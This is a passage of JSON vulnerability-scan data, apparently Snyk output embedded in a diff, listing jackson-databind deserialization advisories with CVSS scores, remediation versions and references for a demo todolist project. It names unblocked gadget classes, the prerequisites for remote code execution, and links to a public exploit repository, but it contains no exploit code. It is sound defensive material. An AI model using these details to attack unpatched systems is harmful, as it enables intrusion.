"patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.pr2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": 
"enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2449", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:54.800234Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:53.931793Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:42.808389Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:54.800234Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.931793Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariDataSource` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-14540.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2449)\n", + "epssDetails": { + "percentile": "0.71702", + "probability": "0.00342", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16335" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-85cw-hj65-qqv9" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T13:03:06.837179Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.pr2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-15T23:30:24Z", 
+ "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T23:30:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.931793Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467015", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "credit": [ + "iSafeBlue" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Functional", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/LeadroyaL/cve-2019-14540-exploit", + "title": "Exploit" + }, + { + "url": 
"https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2410", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:47.850814Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.008832Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:42.892322Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:47.850814Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.008832Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariConfig` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-16335.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [Exploit](https://github.com/LeadroyaL/cve-2019-14540-exploit)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2410)\n", + "epssDetails": { + "percentile": "0.74104", + "probability": "0.00410", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14540" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-h822-r4r5-v8jg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T13:03:10.401907Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + 
"alternativeIds": [], + "disclosureTime": "2019-09-15T23:27:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Functional", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T23:27:25Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.008832Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467016", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.10.0.pr1,2.10.0.pr2)", + "[,2.9.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": 
"https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2420", + "title": "GitHub Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:32.899468Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.cxf.jaxrs.provider.XSLTJaxbProvider`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. 
The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2420)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T14:43:42.115110Z", + "functions_new": [ + { + "version": [ + "[2.10.0.pr1,2.10.0.pr2)", + "[,2.9.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-16T14:37:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T14:37:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:58:32.899468Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + 
"com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469674", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "bsmali4" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10.1)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2478", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.688214Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:53.988000Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + 
"cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:50.462784Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.688214Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.988000Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered within `org.apache.commons.dbcp.datasources.SharedPoolDataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", + "epssDetails": { + "percentile": "0.73908", + "probability": "0.00404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16942" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mx7p-6679-8g3q" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-02T08:02:18.178548Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-01T17:43:33Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-02T17:43:33Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.988000Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469676", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "bsmali4" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10.1)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2478", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.709990Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.024581Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.814203Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.709990Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.024581Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.p6spy.engine.spy.P6DataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` 